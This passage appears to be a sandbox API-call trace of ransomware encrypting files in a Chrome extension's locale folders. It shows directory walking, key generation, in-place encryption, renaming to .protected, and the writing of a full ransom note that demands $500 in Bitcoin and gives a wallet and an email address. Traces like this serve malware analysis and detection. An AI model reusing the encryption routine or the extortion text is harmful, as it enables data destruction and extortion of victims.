SERVER-ID:\r\n") returned 1341 [0081.093] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.094] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.094] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.094] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.094] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.094] CloseHandle (hObject=0x164) returned 1 [0081.094] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0081.094] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0081.094] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja") returned 145 [0081.094] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0081.094] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0081.094] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*") returned 147 [0081.094] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\.") returned 147 [0081.095] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\..") returned 148 [0081.095] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.095] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.095] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.095] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.095] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.095] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.095] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.095] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.096] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json") returned 159 [0081.096] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.096] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x30a, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcf6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x30a, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.102] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.102] CloseHandle (hObject=0x168) returned 1 [0081.102] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected") returned 169 [0081.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\messages.json.protected")) returned 1 [0081.103] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.103] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.103] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\RESTORE_FILES.txt") returned 163 [0081.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.104] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.104] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.104] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.104] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.105] CloseHandle (hObject=0x164) returned 1 [0081.105] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0081.105] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0081.105] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko") returned 145 [0081.105] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0081.105] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0081.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*") returned 147 [0081.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.105] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.105] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.105] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.105] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\.") returned 147 [0081.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.105] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.106] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.106] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\..") returned 148 [0081.106] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.106] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.106] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.106] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.106] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.106] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.106] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.106] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.107] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json") returned 159 [0081.107] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.107] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29d, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.108] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29d, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.109] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.109] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.109] CloseHandle (hObject=0x168) returned 1 [0081.109] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected") returned 169 [0081.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.protected")) returned 1 [0081.110] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.110] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.110] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\RESTORE_FILES.txt") returned 163 [0081.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.110] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.110] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.111] lstrlenA 